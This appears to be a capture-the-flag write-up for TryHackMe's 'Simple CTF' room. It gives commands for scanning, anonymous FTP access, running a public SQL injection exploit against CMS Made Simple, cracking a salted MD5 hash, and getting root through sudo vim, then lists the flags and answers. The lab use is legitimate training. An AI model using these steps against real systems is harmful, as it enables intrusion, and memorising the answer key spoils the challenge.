SimpleCTF TryHackMe

performed by: jb-williams

Simple CTF

Deploy the machine and attempt the questions!

Initial Scan

  • First we run nmap on the target IP.
  • The first scan returned nothing: nmap reported the host as down and suggested adding -Pn (skip host discovery) to the command:
nmap -v -T4 -sV -sC -Pn -oA nmap/initial 10.10.237.242
  • This output will provide the answers for the first two questions.
  • In the nmap output I noticed that the ftp service on port 21 allowed anonymous login.

  • Connect to the FTP server (-p requests passive mode, which is what you usually want from behind a VPN or firewall):
ftp -p 10.10.237.242
  • Log in as user anonymous (any password is accepted for the anonymous account).
  • Typing passive toggles passive mode and prints its current state; in this session the output was:
Passive mode: off; fallback to active mode: off.
  • Then running the command ls will show a directory called pub.
  • Change into that directory with cd pub and run ls again.
  • You will see a file called ForMitch.txt.
  • To download everything in the directory, including ForMitch.txt, run mget *, then exit back to your terminal.
  • Viewing the contents of ForMitch.txt with cat, you see that the user Mitch has a very simple password that is easy to crack.

  • I ran feroxbuster against the target while I was going over the nmap output and the FTP share.
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o ferox-initial.txt -t 15 -L 15 -s 200,302,304 -P http://localhost:8080 -e -u http://10.10.237.242/
  • The main finds were paths /simple/ and /simple/admin/.
  • Traveling to the /simple/ directory we see that the site is using a content management system CMS Made Simple.
  • Scanning that page you can see on the bottom left that the version is 2.2.8

  • Using searchsploit we can see if there are any known exploits for this version.
searchsploit cms made simple 2.2.8
  • The output shows that there is a known exploit CMS Made Simple < 2.2.10 - SQL Injection with the exploit path of php/webapps/46635.py.
  • To get the full path and to look at the exploit run:
searchsploit -x 46635.py
  • Noticed that it can be run with -u for the URL, -w for the path to a wordlist, and --crack to attempt cracking the recovered password hash, then exited the pager.
  • After leaving the pager it will show the full path to that exploit.
Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
  • I copied that exploit to my working directory (searchsploit -m 46635 does the same) and ran it:
python3 46635.py -u http://10.10.237.242/simple --crack -w /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
  • Got an error and opened the script in a text editor.
  • I noticed that the script started with #!/usr/bin/env python, so I changed it to #!/usr/bin/env python3.
  • I also noticed that all the print statements used Python 2 syntax, not Python 3: every print "<Stuff>" needs to become print ("<Stuff>").
  • To do this quickly all at once, I closed the text editor and ran this sed command on 46635.py.

note: this didn't fully work... one edit still had to be made by hand, shown below

sed -i 's#".*"#(&)#g' 46635.py
  • The regex is greedy: it wraps everything from the first to the last double quote on each line in parentheses. That is fine for plain print "..." lines, but on line 183 it double-parenthesised a print that already had a function call, so I changed that line from:
print colored(("<Stuffs>"))

to

print (colored("<Stuffs>"))
  • With that done I re-ran:
python3 46635.py -u http://10.10.237.242/simple --crack -w /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
  • The --crack option didn't work, but the injection itself did and returned a password salt, a username, an email address and a password hash:
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
  • Running the password hash through hash-identifier reports it as most likely MD5 (32 hex characters); the salt line from the exploit tells us it is a salted MD5:
hash-identifier 0c01f4468bd75d7a84c7eb73846e8d96
  • We can use hashcat to crack this; the hash is supplied in passwordhash:salt format.
hashcat -O -a 0 -m 10 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt --show
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret
  • --show only prints hashes that are already in the potfile from a previous run; leave it off for the first run, then re-run with --show to display the result.
  • -O enables the optimized kernels (faster, at the cost of a maximum password length).
  • -a 0 is the attack mode: straight (dictionary) attack.
  • -m 10 is the hash mode: md5($pass.$salt), which is why the hash is given as passwordhash:salt. If the application prepends the salt instead, the matching mode is -m 20, md5($salt.$pass); the two differ only in concatenation order.
  • After the hash and salt comes the path to the rockyou.txt wordlist.
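To see why the hashcat mode matters, here is an added example (not from the writeup and not from the 46635.py exploit) that checks a salted MD5 hash against a small constructed stand-in for rockyou.txt in both concatenation orders and reports which hashcat mode, 10 or 20, a match corresponds to. The hash and salt are the ones recovered above; the four-word list, the function names and the mode constants are this example's own assumptions.

```python
"""Check a salted MD5 hash against a wordlist in both concatenation orders.

Added example; not part of the original writeup or of the 46635.py exploit.
The hash and salt below are the ones the exploit recovered; the wordlist is a
constructed stand-in for rockyou.txt.
"""
import hashlib

# hashcat hash-mode numbers for the two salted-MD5 layouts
MODE_PASS_SALT = 10   # md5($pass.$salt)
MODE_SALT_PASS = 20   # md5($salt.$pass)


def salted_md5(password: str, salt: str, mode: int) -> str:
    """Hex MD5 of password and salt concatenated in the order hashcat mode
    `mode` expects (10 = password then salt, 20 = salt then password)."""
    if mode == MODE_PASS_SALT:
        data = password + salt
    elif mode == MODE_SALT_PASS:
        data = salt + password
    else:
        raise ValueError(f"unsupported hashcat mode {mode}")
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def crack_salted_md5(target_hash: str, salt: str, candidates):
    """Try every candidate password in both orders.

    Returns (hashcat_mode, password) for the first match, or None when nothing
    in the list matches. Trailing newlines are stripped so a file object can be
    passed directly as `candidates`.
    """
    target_hash = target_hash.lower()
    for word in candidates:
        word = word.rstrip("\r\n")
        for mode in (MODE_PASS_SALT, MODE_SALT_PASS):
            if salted_md5(word, salt, mode) == target_hash:
                return mode, word
    return None


def load_wordlist(path: str):
    """Yield lines from a wordlist such as rockyou.txt (latin-1, so the
    non-UTF-8 entries in rockyou do not abort the run)."""
    with open(path, encoding="latin-1", errors="ignore") as fh:
        yield from fh


# Values recovered by the exploit in the writeup
TARGET_HASH = "0c01f4468bd75d7a84c7eb73846e8d96"
SALT = "1dac0d92e9fa6bb2"

# Constructed mini wordlist standing in for rockyou.txt
SAMPLE_WORDS = ["123456", "password", "secret", "letmein"]

if __name__ == "__main__":
    hit = crack_salted_md5(TARGET_HASH, SALT, SAMPLE_WORDS)
    if hit:
        mode, password = hit
        print(f"match: {password!r}  (equivalent to hashcat -m {mode})")
    else:
        print("no match in the sample list")
```

To run it against the real wordlist, replace SAMPLE_WORDS with load_wordlist("/usr/share/wordlists/rockyou.txt"); the mode number it prints is the -m value to use in hashcat for any other hash from the same application.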

  • With mitch's password in hand, we attempt to log in over SSH, which nmap showed listening on port 2222:
ssh mitch@10.10.237.242 -p 2222
  • After logging in, run ls and you see user.txt:
cat user.txt
  • Also, running ls /home shows whether there are any other users' home directories.

  • After getting the user.txt flag I ran sudo -l to see if there was anything this user could run as root, and the output shows that they are allowed to run vim without a password.
  • Navigating to GTFOBins and searching for vim shows a couple of commands for breaking out of restricted environments. I tried option (a): -c runs an ex command at startup, and :!/bin/bash spawns a shell, which inherits root from sudo.
sudo vim -c ':!/bin/bash'
  • Running whoami shows that you are now root.
  • A quick ls /root shows root.txt.
cat /root/root.txt

Answers

How many services are running under port 1000?

  • Answer: 2

What is running on the higher port?

  • Answer: ssh

What's the CVE you're using against the application?

  • Answer: CVE-2019-9053 (found in the comments of the exploit code)

To what kind of vulnerability is the application vulnerable?

  • Answer: sqli

What’s the password?

  • Answer: secret

Where can you login with the details obtained?

  • Answer: ssh

What's the user flag?

  • Answer: G00d j0b, keep up!

Is there any other user in the home directory? What’s its name?

  • Answer: sunbath

What can you leverage to spawn a privileged shell?

  • Answer: vim

What’s the root flag?

  • Answer: W3ll d0n3. You made it!

written and performed by jb-williams - github